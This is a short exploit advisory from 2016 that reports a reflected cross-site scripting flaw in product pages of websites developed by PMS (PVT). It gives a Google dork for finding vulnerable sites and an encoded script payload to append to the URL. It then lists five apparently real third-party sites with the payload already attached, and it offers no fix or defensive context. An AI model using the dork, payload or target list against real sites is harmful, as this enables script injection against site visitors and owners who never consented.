|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |----------------------In The Name Of God------------------------| |[+] Exploit Title: Developed by PMS (PVT) Cross Site Scripting |[+] |[+] Exploit Author: modiret |[+] |[+] Vendor Homepage: http://www.pms.net.pk/ |[+] |[+] Google Dork: intext:"PMS Pvt" inurl:product.php |[+] |[+] Tested on: Win 10 / Mozilla Firefox |[+] |[+] Date: 2016 18 January |[+] |--------------------------------------------------------------| |[+] Exploit: |[+] Search dork and choose a target and add "%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E" after URL! |[+] To see Vulnerability! |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://www.pf1.com.pk/product.php?catid=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E |[+] |[+] http://traceengg.com/test/product.php?id=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E |[+] |[+] http://www.superindus.com/product.php?proid=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E |[+] |[+] http://skfans.com.pk/product.php?proid=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E |[+] |[+] http://www.naturalsaltlamps.com.au/product.php?proid=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28922159%29%3C%2fScRiPt%3E |[+] |--------------------------------------------------------------| |[+] Contact Me: |[+] Yahoo Messenger: amodiret@yahoo.com |[+] instagram: http://instagram.com/modiret/ |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|